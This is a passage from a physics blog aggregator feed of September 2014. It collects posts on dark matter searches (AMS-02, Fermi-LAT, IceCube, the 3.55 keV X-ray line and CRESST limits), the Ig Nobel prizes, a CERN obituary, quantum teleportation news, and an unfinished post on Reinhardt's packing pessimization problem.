To conclude, BICEP goofed it up and deserves ridicule, in the same way a person slipping on a banana skin does. With some minimal precautions the mishap could have been avoided, or at least the damage could have been reduced. On the positive side, science worked once again, and  we all learned something. Astrophysicists learned some exciting stuff about polarized dust in our galaxy. The public learned that science can get it wrong at times but is always self-correcting. And Andrei Linde learned to not open the door to a stranger with a backpack.

by Jester ( at September 26, 2014 09:00 AM

September 25, 2014

Quantum Diaries

Dark Skies II: Indirect Detection and The Quest for the Smoking Gun

Dark matter is a tough thing to study. There is no getting around it: any strategy we can come up with to look for these invisible mystery particles must hinge on the sneaky little creatures interacting in some way with ordinary Standard Model particles. Otherwise we haven’t got even the slightest chance of seeing them.

One of the most popular classes of dark matter candidates is the Weakly Interacting Massive Particles (WIMPs), so called because they do not interact electromagnetically, only weakly, with ordinary matter.  In direct detection we look for WIMPs that interact by scattering off of a Standard Model particle. In contrast, indirect detection looks for interactions that consist of a dark matter particle (either a WIMP or a non-WIMP — it doesn’t matter)  annihilating with another dark matter particle or decaying on its own into Standard Model particles.  These Standard Model end products we have a good chance of detecting if we can just get our backgrounds low enough. In my last post, “Dark Skies: A Very Brief Guide to Indirect Detection,” I gave a more detailed look at the kinds of annihilation and decay products that we might expect from such a process and spoke briefly about some of the considerations that must go into a search for particles from these annihilation and decay processes. Today I will highlight three of the indirect detection experiments currently attacking the dark matter problem.



The Alpha Magnetic Spectrometer (AMS-02) is a large indirect detection experiment situated on the International Space Station. I am especially excited to talk to you about this experiment because just a couple of days ago AMS-02 released a very interesting result. Although I include a link to the press release and the relevant papers below, I intend to give away the punchline by summarizing here everything I know about the AMS-02 experiment and their result from this past week.

(Left) A 3D rendering of the AMS-02 detector, from the AMS-02 group website,

Fig. 1: (Left) A 3D rendering of the AMS-02 detector, from the AMS-02 group website located at  (Right) A schematic of the AMS-02 detector showing all of its various subsystems [1].

First, let’s talk about the design of the experiment (Fig. 1). As the infamous Shrek once said, ogres are like onions. Well, most big particle physics experiments are like onions too. They consist of many layers of detectors interspersed with different kinds of shielding – the quintessential example being big collider experiments like ATLAS and CMS at the Large Hadron Collider. AMS-02 has just as many layers and almost as much complexity to it as something like ATLAS. In no particular order, these layers are:

  • A donut-shaped superconducting magnet surrounding most of the AMS-02 detector. Any particles traversing through the hole in the donut will be deflected by the magnet, and particles of different charges are deflected in different directions. The magnet therefore is an effective way to separate positrons from electrons, positive ions from negative ones, and antimatter from ordinary matter.
  • Veto or anticoincidence counters (ACCs) that lie just inside the superconducting magnet. The ACCs tag any particle that enters the detector through the side rather than the hole in the magnet thus allowing the AMS-02 to reject particle events that do not have well-understood trajectories.
  • A Transition Radiation Detector (TRD) consisting of twenty layers of material (that provides discrimination between extremely high-energy leptons (positrons, electrons) and hadrons (protons, etc) that are traveling near the speed of light. Each time an electron or positron passes through the TRD, it produces a shower of x-rays as it crosses the interface between layers, but a proton or other hadron does not.
  • The Time of Flight (ToF) system, which consists of 4 layers of scintillation counters, two above and two below the detector that measure the time it takes for a particle to traverse the detector and also serve as a trigger system, indicating to the other subsystems that a particle has entered the detector.
  • The tracker, which consists of eight layers of double-sided silicon sensors that record the path of any particle that enters the the detector through the magnet. By the time a particle has reached the tracker, the magnet has already done half the work by separating positively-charged from negatively-charged particles. By looking at the trajectory of each particle inside the tracker, the AMS-02 can not only determine which particles are positive and negative but also the atomic number Z of any nucleus that enters the detector, hence the “Spectrometer” part of “Alpha Magnetic Spectrometer.”
  • A Ring Imaging Cherenkov detector (RICH) which measures particle velocities by looking at the shape of the Cherenkov radiation that is produced by incident particles.
  • An electromagnetic calorimeter (ECAL) consisting of a dense piece of material inside which incident particles produce secondary showers of particles. By looking at these particle showers, the ECAL helps to discriminated between leptons (electrons, positrons, gammas) and hadrons (e.g. protons) that, if they have the same trajectory through the magnet, might be otherwise impossible to tell apart.

Although it sounds complicated, the combined power of all these various subdetectors allows AMS-02 to do a spectacular job of characterizing many different types of particles.  Here, the particles relevant to dark matter detection are antimatter particles such as positrons, antiprotons, and antideuterons. In the absence of exotic processes, we expect the spectra of these particles to be smoothly decreasing, isotropic, and generally well-behaved. Any bumps or features in, say, the positron or antiproton spectra would indicate some new process at work –like possibly WIMP annihilations [2].

(Fig. 2) The positron fraction measurement released by the AMS-02 collaboration in spring 2013.

Fig. 2: The first positron fraction measurement produced by the AMS-02 collaboration, released in April 2013 [3].

Back in April 2013, AMS-02 released its first measurement of the fraction of positrons as compared to electrons in cosmic rays (Fig 2). Clearly the curve in Fig. 2 is not decreasing – there is some other source of positrons at work here. There was some small speculation among the scientific community that the rise in positron fraction at higher energies could be attributed to dark matter annihilations, but the general consensus was that this shape is caused by a more ordinary astrophysical source such as pulsars. So in general, how do you tell what kind of positron source could cause this shape of curve? The answer is this: if the rise in positron fraction is due to dark matter annihilations, you can expect to see a very sharp dropoff at higher energies. A less exotic astrophysical source would result in a smooth flattening of this curve at higher energies [3].

Fig. 3:  The positron fraction akdsjhkajsh

Fig. 3: An updated positron fraction measurement from two years’ worth of data released by the AMS-02 collaboration on September 18, 2014 [4].

On September 18, 2014, AMS-02 released a followup to its 2013 result covering a larger range of energies in order to further investigate this positron excess (Fig. 3). The positron fraction curve does in fact begin to drop off at higher energies. Is it a smoking-gun signal of WIMP annihilations? Not yet – there are not enough statistics at high energies to differentiate between a smooth turnover or an abrupt drop in positron fraction. For now, the AMS-02 plans to investigate the positron flux at even higher energies to determine the nature of this turnover and to do a similar measurement with the antiproton fraction as compared to regular protons.

For a webcast of the official press release, you can go here. Or, to read about the AMS-02 results in more detail, check out the references [1] and [4] at the bottom of this article.



Fig. x:

Fig. 4: A view of the gamma-ray sky from the Fermi-LAT instrument, from The bright line is the galactic plane.

The Fermi Large Area Telescope (LAT) is another indirect detection experiment that has seen hints of something interesting. In this particular experiment, the signal of interest comes from gamma rays of energies ranging from tens of MeVs to more than 300 GeV. The science goals are to study and catalog localized gamma-ray sources, to investigate the diffuse gamma-ray background in our part of the universe, and to search for gamma rays resulting from new physics processes, such as dark matter annihilations.

Because the Earth’s atmosphere is not transparent to gamma rays, our best chance to study them lies out in space. The Fermi-LAT is a very large space-based observatory which detects gammas through a mechanism called pair conversion, where a high-energy photon rather than being reflected or refracted upon entering a medium converts into an electron-positron pair. Inside the LAT, this conversion takes place inside a tracker module in one of several thin-yet-very-dense layers of tungsten. There are sixteen of these conversion layers total, interleaved with eighteen layers of silicon strip detectors that record the x- and y- position of any tracks produced by the electron-positron pair. Beneath the tracker modules is a calorimeter, consisting of a set of CsI modules that absorb the full energy of the electrons and positrons and therefore give us a good measure of the energy of the original gamma ray. Finally, the entire detector is covered by an anticoincidence detector (ACD) consisting of plastic scintillator tiles that scintillate when charged particles pass through them but not when gamma rays pass through, thereby providing a way to discriminate the signal of interest from cosmic ray backgrounds (Fig. 5).


Fig. 5: (Left) A 3D rendering of the Fermi spacecraft deployed above the earth, from (Right) A design schematic of the Fermi-LAT instrument, also from

One of the nice things about the Fermi telescope is that it not only has a wide field of view and continually scans across the entire sky, but it can also be pointed at specific locations. Let’s consider for a moment some of the places we could point the Fermi-LAT if we are hoping to detect a dark matter signal [6].

  • The probability of dark matter annihilations taking place is highest in regions of high density like our galactic center, but there is a huge gamma-ray background to contend with from many various astrophysical sources. If we look further out into our galactic halo, there will be less background, but also less statistics for our signal of interest. And there is still a diffuse gamma-ray background to contend with. However, a very narrow peak in the gamma spectrum that is present across the entire sky and not associated with any one particular localized astrophysical source would be very suggestive of a dark matter signal – exactly the kind of smoking gun we are looking for.
  • We could also look at other galaxies. Certain kinds of galaxies called dwarf spheroidals are particularly promising for a number of reasons. First of all, the Milky Way has several close dwarf neighbors, so there are plenty to choose from. Second, dwarf galaxies are very dim. They have few stars, very little gas, and few gamma-ray sources like pulsars or supernova remnants. Should a gamma signal be seen across several of these dwarf galaxies, it would be very hard to explain by any means other than dark matter annihilation.

In spring 2012, two papers came out one after another suggesting that a sharp gamma peak had indeed been found near the galactic center, which you can see in Fig. 6 [7, 8]. What is the cause of this feature? Was it some kind of instrumental effect? A statistical fluctuation? Was it the dark matter smoking gun? The Fermi-LAT team officially commented on these papers later that November, reporting a feature that was much less statistically significant and much closer to 135 GeV and consistent with gamma rays produced by cosmic rays in the earth’s atmosphere [9].

Fig. 5: The 2012 gamma-ray spectrum produced from three years of data.  The green markers represent the best-fit background-only model, the red markers represent the best-fit background + WIMP annihilation model, and the black points are the counts that were actually observed in each energy bin.  The bottom panel shows the residual. [7]

Fig. 6: The gamma-ray spectrum reported by Fermi in 2012 [7]. The black points show the number of counts observed in each energy bin.  The green markers represent the best-fit background-only model, the red markers represent the best-fit background + WIMP annihilation model, and the blue dots represent the best-fit WIMP annihilation model with the background subtracted off.

This gamma line has been an active target of study since 2012. In 2013, the Fermi-LAT group released a further investigation of this feature using over 3.7 years of data. A bump in the spectrum at about 133 GeV was again observed, consistent with the 2012 papers, but with decreased statistical significance in part because this feature was narrower than the energy resolution of the LAT and because a similar (yet smaller) feature was seen in the earth’s “limb”, or outermost edges of the atmosphere [10]. The hypothesis that this bump in the gamma-ray spectrum is a WIMP signal has all but fallen out of favor within the scientific community.

In the meantime, Fermi-LAT has also been looking for gamma rays from nearby dwarf galaxies. A survey of 25 dwarf galaxies near the Milky Way yielded no such statistically-significant signal [11]. For the next few years, Fermi will continue its search for dark matter as well continuing to catalog and investigate other astrophysical gamma-ray sources.



Fig. x: The IceCube collaboration.  Image from

Fig. 7: Members of the IceCube collaboration. Image from

Last but certainly not least, I wanted to discuss one of my particular favorite experiments. IceCube is really cool for many reasons, not the least of which is because it is situated at the South Pole! Like LUX (my home experiment), IceCube consists of a large array of light sensors (photomultiplier tubes) that look for flashes of light indicating particle interactions within a large passive target. Unlike LUX, however, the target medium in IceCube is the Antarctic ice itself, which sounds absolutely fantastical until you consider the following: if you go deep enough, the ice is extremely clear and uniform, because the pressure prevents bubble formation; and if you go deep enough it becomes very dark, so that any flashes of light inside the ice will stand out.

In IceCube, neutrinos are the main particles of interest. They are the ninjas of the particle physics world – neutrinos interact only very rarely with other particles and are actually rather difficult to detect. However, when your entire detector consists of a giant chunk of ice 2.5 kilometers deep, that’s a lot of material, resulting in a not-insignificant probability that a passing neutrino will interact with an atom inside your detector. A neutrino interacting with the ice will produce a shower of secondary charged particles, which in turn produce Cherenkov radiation that can be detected. Neutrinos themselves are pretty awesome on their own, and there is a wealth of interesting neutrino research currently taking place. They can also tell us a lot about a variety of astrophysical entities such as gamma-ray bursts and supernovae. And even more importantly for this article, neutrinos can occur as a result of dark matter annihilations.

Unfortunately for the dark matter search, muons and neutrinos produced by cosmic ray interactions in the atmosphere are a major source of background in the detector. Muons, because they are quite heavy, tend to travel long distances in most materials. Luckily, they don’t travel nearly as far as neutrinos – we’re talking on the order of only a few meters on average before they attenuate in a medium like ice. Neutrinos travel vastly further, so a good way to discriminate between cosmic-ray muons and neutrinos is to eliminate any downwards-traveling particles. Any upwards-traveling particle tracks must be from astrophysical neutrinos, because only they can traverse the entire diameter of the Earth without getting stopped somewhere in the ground. To put it more succinctly: IceCube makes use of the entire Earth as a shield against backgrounds! Atmospheric neutrinos are a little more difficult to distinguish from the astrophysical neutrinos relevant to dark matter searches, but are neve­rtheless an active target of study and are becoming increasingly better understood.

Now that we’ve talked about the rationale of building gigantic detectors out of ice and the kinds of signals and backgrounds to expect in such detectors, let’s talk the actual design of the experiment. IceCube consists of 86 strings of 60 digital optical modules, each consisting of a photomultiplier tube and a readout board, deployed between 1.5 and 2.5 kilometers deep in the Antarctic ice. How do you get the modules down there? Only with the help of very powerful hot-water drills. The drilling of these holes and the construct­ion of IceCube is exciting enough that it probably warrants its own article.


Fig. 8: A schematic of the IceCube experiment.  Note the Eiffel Tower included for scale.  Image from [12].

Alongside the strings that make up the bulk of the detector, IceCube also contains a couple of other subdetectors. There is a detector called IceTop on the surface of the ice that is used to help veto events that are atmospheric in origin. There is another detector called DeepCore that consists of additional strings with optical modules packed much more tightly together than the regular strings for the purpose of looking of increasing the sensitivity to low-energy events. Other special extensions designed to look for very high and very low energy events are also planned for the near future.

With regards to the quest for dark matter, the IceCube strategy is to focus on two different WIMP annihilation models: χχ to W+W- (or τ+τ- for WIMPs that are lighter than W bosons) and χχ to b b-bar. In each case, the decay products produce secondary particles, including some neutrinos. By examining neutrinos both from the sun and from other galaxies and galaxy clusters, IceCube has produced a very competitive limit on the cross section for dark matter annihilation via these and other similar annihilation modes [12, 13].

Fig. 9:

Fig. 9: IceCube’s 2012  limit on dark matter – proton spin dependent interactions.  All of the black curves correspond to different neutrino models.  Image from [15].

For more information, there is a wonderful in-depth review of the IceCube detector design and status at the Annual Review of Nuclear and Particle Science.


So there you have it. These are some of the big projects keeping an eye out for WIMPs in the sky. At least some of these experiments have seen hints of something promising, so over the next couple years maybe we’ll finally get that five-sigma discovery that we want so badly to see.



[1] AMS Collaboration. “High statistics measurement of the positron fraction is primary cosmic rays of 0.5-500 GeV with the Alpha Magnetic Spectrometer on the International Space Station.” Phys. Rev. Lett. 113 (2014) 121101.

[2] AMS Collaboration. “First result from the Alpha Magnetic Spectrometer on the International Space Station: Precision measurement of the positron fraction in primary cosmic rays of 0.5-350 GeV.” Phys. Rev. Lett. 110 (2013) 141102.

[3] Serpico, Pasquale D. “Astrophysical models for the origin of the positron ‘excess’.”  Astroparticle Physics, Vol. 39, pg. 2-11 (2011). ArXiv e-print 1108.4827.

[4] AMS Collaboration. “Electron and positron fluxes in primary cosmic rays measured with the Alpha Magnetic Spectrometer on the International Space Station.” Phys. Rev. Lett. 113 (2014) 121102.

[5] Fermi-LAT Collaboration.  “The large area telescope on the Fermi Gamma-Ray Space Telescope mission.” The Astrophysical Journal, Vol. 697, Issue 2, pp. 1071-1102 (2009). ArXiv e-print 0902.1089.

[6] Bloom, Elliott. “The search for dark matter with Fermi.” Conference presentation – Dark Matter 2014, Westwood, CA.

[7] Bringmann, Torsten, et al. “Fermi LAT search for internal bremsstrahlung signatures from dark matter annihilation.” JCAP 1207 (2012) 054. ArXiv e-print 1203.1312.

[8] Weniger, Christoph. “A tentative gamma-ray line from dark matter annihilation at the Fermi Large Area Telescope.” JCAP 1208 (2012) 007. ArXiv e-print 1204.2797.

[9] Albert, Andrea. “Search for gamma-ray spectral lines in the Milky Way diffuse with the Fermi Large Area Telescope.” Conference presentation – The Fermi Symposium 2012.

[10] Fermi-LAT Collaboration. “Search for gamma-ray spectral lines with the Fermi Large Area Telescope and dark matter implications.” Phys.Rev. D 88 (2013) 082002 . ArXiv e-print 1305.5597.

[11] Fermi-LAT Collaboration. “Dark matter constraints from observations of 25 Milky Way satellite galaxies with the Fermi Large Area Telescope.” Phys.Rev. D 89 (2014) 4, 042001. ArXiv e-print 1310.0828.

[12] IceCube Collaboration. “Measurement of South Pole ice transparency with the IceCube LED calibration system.” ArXiv e-print 1301.5361I.

[13] IceCube Collaboration. “Search for dark matter annihilations in the Sun with the 79-string IceCube detector.” Phys. Rev. Lett. 110, 131302 (2013). ArXiv e-print 1212.4097v2.

[14] IceCube Collaboration. “IceCube search for dark matter annihilation in nearby galaxies and galaxy clusters.” Phys. Rev. D 88 (2013) 122001. ArXiv e-print 1307.3473v2.

[15] Arguelles, Carlos A., and Joachim Kopp. “Sterile neutrinos and indirect dark matter searches in IceCube.” JCAP 1207 (2012) 016. ArXiv e-print 1202.3431.

by Nicole Larsen at September 25, 2014 03:50 PM

arXiv blog

The Coming Era Of Self-Assembly Using Microfluidic Devices

Researchers are assessing the potential of an entirely new way to make exotic materials based on microfluidic self-assembly.

When it comes to building microscopic devices, one of the most promising ideas is to exploit the process of self-assembly. In this way, complex structures can be created by combining building blocks under natural circumstances.

September 25, 2014 02:20 PM

Jester - Resonaances

X-ray bananas
This year's discoveries follow the well-known 5-stage Kübler-Ross pattern: 1) announcement, 2) excitement, 3) debunking, 4) confusion, 5) depression.  While BICEP is approaching the end of the cycle, the sterile neutrino dark matter signal reported earlier this year is now entering stage 3. This is thanks to yesterday's paper entitled Dark matter searches going bananas by Tesla Jeltena and Stefano Profumo (to my surprise, this is not the first banana in a physics paper's title).

In the previous episode, two independent analyses  using public data from XMM and Chandra satellites concluded the presence of an  anomalous 3.55 keV monochromatic emission from galactic clusters and Andromeda. One possible interpretation is a 7.1 keV sterile neutrino dark matter decaying to a photon and a standard neutrino. If the signal could be confirmed and conventional explanations (via known atomic emission lines) could be excluded, it would mean we are close to solving the dark matter puzzle.

It seems this is not gonna happen. The new paper makes two claims:

  1. Limits from x-ray observations of the Milky Way center exclude the sterile neutrino interpretation of the reported signal from galactic clusters. 
  2. In any case, there's no significant anomalous emission line from galactic clusters near 3.55 keV.       

Let's begin with the first claim. The authors analyze several days of XMM observations of the Milky Way center. They find that the observed spectrum can be very well fit by known plasma emission lines. In particular, all spectral features near 3.5 keV are accounted for if Potassium XVIII lines at 3.48 and 3.52 keV are included in the fit. Based on that agreement, they can derive strong bounds on the parameters of the sterile neutrino dark matter model: the mixing angle between the sterile and the standard neutrino should satisfy sin^2(2θ) ≤ 2*10^-11. This excludes the parameter space favored by the previous detection of the 3.55 keV line in  galactic clusters.  The conclusions are similar, and even somewhat stronger, as in the earlier analysis using Chandra data.

This is disappointing but not a disaster yet, as there are alternative dark matter models (e.g. axions converting to photons in the magnetic field of a galaxy) that do not predict observable emission lines from our galaxy. But there's one important corollary of the new analysis. It seems that the inferred strength of the Potassium XVIII lines compared to the strength of other atomic lines does not agree well with theoretical models of plasma emission. Such models were an important ingredient in the previous analyses that found the signal. In particular, the original 3.55 keV detection paper assumed upper limits on the strength of the Potassium XVIII line derived from the observed strength of the Sulfur XVI line. But the new findings suggest that systematic errors may have been underestimated.  Allowing for a higher flux of Potassium XVIII, and also including the 3.51 Chlorine XVII line (that was missed in the previous analyses), one can a obtain a good fit to the observed x-ray spectrum from galactic clusters, without introducing a dark matter emission line. Right... we suspected something was smelling bad here, and now we know it was chlorine... Finally, the new paper reanalyses the x-ray spectrum from Andromeda, but it disagrees with the previous findings:  there's a hint of the 3.53 keV anomalous emission line from Andromeda, but its significance is merely 1 sigma.

So, the putative dark matter signals are dropping like flies these days. We urgently need new ones to replenish my graph ;)

Note added: While finalizing this post I became aware of today's paper that, using the same data, DOES find a 3.55 keV line from the Milky Way center.  So we're already at stage 4... seems that the devil is in the details how you model the potassium lines (which, frankly speaking, is not reassuring).

by Jester ( at September 25, 2014 02:12 PM

Jester - Resonaances

Weekend Plot: Prodigal CRESST
CRESST is one of the dark matter direct detection experiments seeing an excess which may be interpreted as a signal of a fairly light (order 10 GeV) dark matter particle.  Or it was... This week they posted a new paper reporting on new data collected last year with an upgraded detector. Farewell CRESST signal, welcome CRESST limits:
The new limits (red line) exclude most of the region of the parameter space favored by the previous CRESST excess: M1 and M2 in the plot.  Of course, these regions have never been taken at face value because they are excluded by orders of magnitude by the LUX, Xenon, and CDMS experiments. Nevertheless, the excess was pointing to similar dark matter mass as the signals reported DAMA, CoGeNT, and CDMS-Si (other color stains), which prompted many to speculate a common origin of all these anomalies. Now the excess is gone. Instead, CRESST emerges as an interesting player in the race toward the neutrino wall. Their target material - CaWO4 crystals - contains oxygen nuclei which, due their small masses, are well suited for detecting light dark matter. The kink in the limits curve near 5 GeV is the point below which dark-matter-induced recoil events would be dominated by scattering on oxygen. Currently, CRESST has world's best limits for dark matter masses between  2 and 3 GeV, beating DAMIC (not shown in the plot) and CDMSlite (dashed green line).

by Jester ( at September 25, 2014 02:11 PM

CERN Bulletin

CERN Bulletin Issue No. 39-40/2014
Link to e-Bulletin Issue No. 39-40/2014Link to all articles in this issue No.

September 25, 2014 09:06 AM

September 24, 2014

ZapperZ - Physics and Physicists

2014 Ig Nobel Prize
As usual at this time of the year, the Ig Nobel Prizes has been awarded to a group of really serious but fun/useless/trivial/etc work. The award for physics this year is on the study on how slippery banana peel really is.

Physics: A Japanese team has finally tested whether, indeed, banana skins are really as slippery as slapstick comedy would have us believe. In “Frictional Coefficient under Banana Skin,” they show a banana skin reduces the friction between a shoe sole and the floor by about a fifth. 

But what caught my eye was the award given for Neuroscience, which I don't think is that trivial or useless.

Neuroscience: In “Seeing Jesus in Toast,” a team from China and Canada have clinched the neuroscience prize with an exploration of a phenomenon called face pareidolia, in which people see nonexistent faces. First, they tricked participants into thinking that a nonsense image had a face or letter hidden in it. Then, they carefully monitored brain activity in the participants they managed to convince, to understand which parts of our minds are to blame.

This is, actually, quite important in arguing against people who rely on "seeing" with their eyes as a primary source of evidence, which are often part of an anecdotal evidence.

I argued before on why our eyes are really not a reliable detector. That post came about because I've often been questioned about the validity of the existence of an electron simply because we haven't "seen" it with our eyes. I put forth a few facts on why our eyes is really a rather bad standard to use in detecting anything simply due to the limitations it has on a number of properties.

This paper about seeing Jesus in toast is another solid point to add to those arguments about us "seeing" something. It adds to the fact that we do not just see something, but also PROCESS the optical signal from our eyes via our brain. Our brain, due to either conditioning, evolution, etc., has added these filters, pattern recognition, etc. to help us interpret what we are seeing. And it is because of that that we have the potential to see something that isn't really there. This work clearly proves that!

It is another reason "seeing" with our eyes may not always be a reliable evidence.


by ZapperZ ( at September 24, 2014 04:26 PM

CERN Bulletin

Hervé Genoud (1982-2014)

On Monday 22 September, early morning, we received with enormous sadness a message that Hervé Genoud passed away after an eight-month battle with leukaemia at the age of just 32.


“Hervé s’est envolé vers la lumière,” wrote Mélissa, his wife, in her message. He sadly leaves behind his wife Mélissa and his two young children Maxence and Nathanaël.

Hervé joined the BE-OP group as operator on the PS in June 2006 where he quickly integrated and became a core member of the operations team. He did not limit his work to the PS, but was also very much appreciated for his roles in the LHC quench protection system and his outreach activities, such as the CERN open days and La nuit des chercheurs.

With this loss we not only lose a colleague, but also a good friend for many. We will never forget his enthusiasm, his jokes and his very positive approach, not only in his work, but also during his battle against his illness. When he felt able he regularly kept his direct colleagues and friends updated on his situation and used to sign his messages with “Hervé, Chasseur de Globules Blancs Merdique dans l'escadron Cortisone-Chimio”, indicating his determination to fight his disease and not losing his sense of humor.

We wish Mélissa, his children and family all the necessary strength to overcome this loss.

His friends and colleagues

We deeply regret to announce the death of Hervé Genoud on 22 September 2014.

Hervé Genoud, who was born on 6 April 1982, worked in the BE Department and had been at CERN since 1 September 2003.

The Director-General has sent a message of condolence to his family on behalf of the CERN personnel.

Social Affairs
Human Resources Department

September 24, 2014 04:09 PM

ZapperZ - Physics and Physicists

Teleportation to a Solid-State Quantum Memory
The Gisin group has done it again! This time, they have managed to teleport a quantum state via photons and into a quantum memory in a form of a doped crystal.

Today, Felix Bussières at the University of Geneva in Switzerland and a few pals say they’ve taken an important step towards this. These guys have teleported quantum information to a crystal doped with rare-earth ions—a kind of quantum memory. But crucially they’ve done it for the first time over the kind of ordinary optical fiber that telecommunications that are in use all over the world.

This work has been published in Nature Photonics.


by ZapperZ ( at September 24, 2014 03:57 PM

September 23, 2014

The n-Category Cafe

A Packing Pessimization Problem

In a pessimization problem, you try to minimize the maximum value of some function:

<semantics>min xmax yf(x,y)<annotation encoding="application/x-tex"> min_x max_y f(x,y) </annotation></semantics>

For example: which convex body in Euclidean space is the worst for packing? That is, which has the smallest maximum packing density?

(In case you’re wondering, we restrict attention to convex bodies because without this restriction the maximum packing density can be made as close to <semantics>0<annotation encoding="application/x-tex">0</annotation></semantics> as we want.)

Of course the answer depends on the dimension. According to Martin Gardner, Stanislaw Ulam guessed that in 3 dimensions, the worst is the round ball. This is called Ulam’s packing conjecture.

In 3 dimensions, congruent balls can be packed with a density of

<semantics>π18=0.74048048<annotation encoding="application/x-tex"> \frac{\pi}{\sqrt{18}} = 0.74048048 \dots </annotation></semantics>

and Kepler’s conjecture, now a theorem, says that’s their maximum packing density. So, Ulam’s packing conjecture says we can pack congruent copies of any other convex body in <semantics> 3<annotation encoding="application/x-tex">\mathbb{R}^3</annotation></semantics> with a density above <semantics>π/18<annotation encoding="application/x-tex">\pi/\sqrt{18}</annotation></semantics>.

Ulam’s packing conjecture is still open. We know that the ball is a local pessimum for ‘centrally symmetric’ convex bodies in 3 dimensions. But that’s just a small first step.

Geometry is often easier in 2 dimensions… but in some ways, the packing pessimization problem for convex bodies in 2 dimensions is even more mysterious than in 3.

You see, in 2 dimensions the disk is not the worst. The disk has maximum packing density of

<semantics>π12=0.9068996<annotation encoding="application/x-tex"> \frac{\pi}{\sqrt{12}} = 0.9068996 \dots </annotation></semantics>

However, the densest packing of regular octagons has density

<semantics>4+425+42=0.9061636<annotation encoding="application/x-tex"> \frac{4 + 4 \sqrt{2}}{5 + 4 \sqrt{2}} = 0.9061636 \dots </annotation></semantics>

This is a tiny bit less! So, the obvious 2-dimensional analogue of Ulam’s packing conjecture is false.

By the way, the densest packing of regular octagons is not the one with square symmetry:

It’s this:

which is closer in spirit to the densest packing of discs:

The regular octagon is not the worst convex shape for packing the plane! Regular heptagons might be even worse. As far as I know, the densest known packing of regular heptagons is this ‘double lattice’ packing:

studied by Greg Kuperberg and his father. They showed this was the densest packing of regular heptagons where they are arranged in two lattices, each consisting of translates of a given heptagon. And this packing has density

<semantics>297(111+492cos(π7)356cos 2(π7))=0.89269<annotation encoding="application/x-tex"> \frac{2}{97}\left(-111 + 492 \cos\left(\frac{\pi}{7}\right) - 356 \cos^2 \left(\frac{\pi}{7}\right)\right) = 0.89269 \dots </annotation></semantics>

But I don’t know if this is the densest possible packing of regular heptagons.

Unlike the heptagon, the regular octagon is centrally symmetric: if we put its center at the origin, a point <semantics>x<annotation encoding="application/x-tex">x</annotation></semantics> is in this region iff <semantics>x<annotation encoding="application/x-tex">-x</annotation></semantics> is in the region.

The great thing about convex centrally symmetric regions of the plane is that their densest packing is always a lattice packing: you take your region <semantics>R<annotation encoding="application/x-tex">R</annotation></semantics> and form a packing by using all its translates <semantics>R+L<annotation encoding="application/x-tex">R + L</annotation></semantics> where <semantics>L 2<annotation encoding="application/x-tex">L \subseteq \mathbb{R}^2</annotation></semantics> is a lattice. This is an old result of László Fejes Tóth and C. A. Rogers. For convex centrally symmetric regions, it reduces the search for the densest packing to a finite-dimensional maximization problem!

I said the regular octagon wasn’t the worst convex shape for densely tiling the plane. Then I said the regular heptagon might be worse, but I didn’t know. So what’s worse?

A certain smoothed octagon is worse:

Since it’s centrally symmetric, we know its densest packing is a lattice packing, so it’s not miraculous that someone was able to work out its density:

<semantics>842ln2221=0.902414<annotation encoding="application/x-tex"> \frac{ 8-4\sqrt{2}-\ln{2} }{2\sqrt{2}-1} = 0.902414 \dots </annotation></semantics>

and the way it looks:

In fact this shape is believed to be the worst centrally symmetric convex region for densely packing the plane! I don’t really know why. But Thomas Hales, who proved the Kepler conjecture, has an NSF grant based on a proposal where he says he’ll prove this:

In 1934, Reinhardt considered the problem of determining the shape of the centrally symmetric convex disk in the plane whose densest packing has the lowest density. In informal terms, if a contract requires a miser to make payment with a tray of identical gold coins filling the tray as densely as possible, and if the contract stipulates the coins to be convex and centrally symmetric, then what shape of coin should the miser choose in order to part with as little gold as possible? Reinhardt conjectured that the shape of the coin should be a smoothed octagon. The smoothed octagon is constructed by taking a regular octagon and clipping the corners with hyperbolic arcs. The density of the smoothed octagon is approximately 90 per cent. Work by previous researchers on this conjecture has tended to focus on special cases. Research of the PI gives a general analysis of the problem. It introduces a variational problem on the special linear group in two variables that captures the structure of the Reinhardt conjecture. An interesting feature of this problem is that the conjectured solution is not analytic, but only satisfies a Lipschitz condition. A second noteworthy feature of this problem is the presence of a nonlinear optimization problem in a finite number of variables, relating smoothed polygons to the conjecturally optimal smoothed octagon. The PI has previously completed many calculations related to the proof of the Reinhardt conjecture and proposes to complete the proof of the Reinhardt conjecture.

This research will solve a conjecture made in 1934 by Reinhardt about the convex shape in the plane whose optimal packing density is as small as possible. The significance of this proposal is found in its broader context. Here, three important fields of mathematical inquiry are brought to bear on a single problem: discrete geometry, nonsmooth variational analysis, and global nonlinear optimization. Problems concerning packings and density lie at the heart of discrete geometry and are closely connected with problems of the same nature that routinely arise in materials science. Variational problems and more generally control theory are have become indispensable tools in many disciplines, ranging from mathematical finance to robotic control. However, research that gives an exact nonsmooth solution is relatively rare, and this feature gives this project special interest among variational problem. This research is also expected to further develop methods that use computers to obtain exact global solutions to nonlinear optimization problems. Applications of nonlinear optimization are abundant throughout science and arise naturally whenever a best choice is sought among a system with finitely many parameters. Methods that use computers to find exact solutions thus have the potential of finding widespread use. Thus, by studying this particular packing problem, mathematical tools may be further developed with promising prospects of broad application throughout the sciences.

I don’t have the know-how to guess what Hales will do. I haven’t even read the proof of that theorem by László Fejes Tóth and C. A. Rogers! It seems like a miracle to me.

But here are some interesting things that it implies.

Let’s say a region is a relatively compact open set. Just for now, let’s say a shape is a nonempty convex centrally symmetric region in the plane, centered at the origin. Let <semantics>Shapes<annotation encoding="application/x-tex">Shapes</annotation></semantics> be the set of shapes. Let <semantics>Lattices<annotation encoding="application/x-tex">Lattices</annotation></semantics> be the set of lattices in the plane, where a lattice is a discrete subgroup isomorphic to <semantics> 2<annotation encoding="application/x-tex">\mathbb{Z}^2</annotation></semantics>.

We can define a function

<semantics>density:Shapes×Lattices[0,1]<annotation encoding="application/x-tex"> density: Shapes \times Lattices \to [0,1] </annotation></semantics>

